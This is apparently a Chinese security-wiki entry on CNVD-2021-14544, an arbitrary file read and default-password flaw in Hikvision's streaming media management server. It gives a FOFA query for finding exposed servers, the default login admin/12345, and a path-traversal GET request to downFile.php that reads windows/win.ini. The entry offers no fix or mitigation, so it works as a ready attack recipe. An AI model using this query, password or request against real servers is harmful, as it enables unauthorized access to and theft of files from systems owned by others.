海康威视 流媒体管理服务器任意文件读取/通用弱口令 CNVD-2021-14544

杭州海康威视系统技术有限公司流媒体管理服务器存在弱口令漏洞,攻击者可利用该漏洞获取敏感信息。

FOFA:

title="流媒体管理服务器"

默认口令:admin/12345

PoC:

GET /systemLog/downFile.php?fileName=../../../../../../../../../../../../../../../windows/win.ini HTTP/1.1
Host:

ref:

Edge Security文库 all right reserved,powered by GitbookFile Modify: 2021-05-22 00:14:38

results matching ""

    No results matching ""